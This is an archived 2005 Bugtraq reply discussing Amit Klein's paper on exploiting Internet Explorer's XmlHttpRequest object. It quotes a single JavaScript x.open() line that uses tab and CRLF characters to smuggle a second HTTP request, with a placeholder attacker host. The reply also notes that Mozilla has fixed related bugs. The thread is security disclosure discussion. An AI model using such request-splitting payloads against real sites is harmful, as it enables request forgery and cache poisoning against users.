Bugtraq mailing list archives
Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein
From: Yutaka OIWA <y.oiwa () aist go jp>
Date: Tue, 27 Sep 2005 21:34:11 +0900
Hello Amit, "Amit Klein (AKsecurity)" <aksecurity () hotpop com> writes:
x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP /1.0\r\nFoobar:","http://www.attacker.site/",false);
This kind of bugs are already fixed in recent Mozilla browsers, as shown in your reference [4].
[4] "setRequestHeader can be exploited using newline characters", Bugzilla bug 297078 https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and "XMLHttpRequest allows dangerous request headers to be set", Bugzilla bug 302263 https://bugzilla.mozilla.org/show_bug.cgi?id=302263
see comment #15 of bug 297078. https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15 -- Yutaka OIWA Research Center for Information Security National Institute of Advanced Industrial Science and Technology (AIST) Mail addresses: <y.oiwa () aist go jp>, <yutaka () oiwa jp> OpenPGP: id[995DD3E1] fp[3C21 17D0 D953 77D3 02D7 4FEC 4754 40C1 995D D3E1]
Current thread:
- "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Amit Klein (AKsecurity) (Sep 24)
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Yutaka OIWA (Sep 27)
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Amit Klein (AKsecurity) (Sep 28)
- <Possible follow-ups>
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein anonymous (Sep 27)
- RE: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Sergey V. Gordeychik (Sep 30)
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Yutaka OIWA (Sep 27)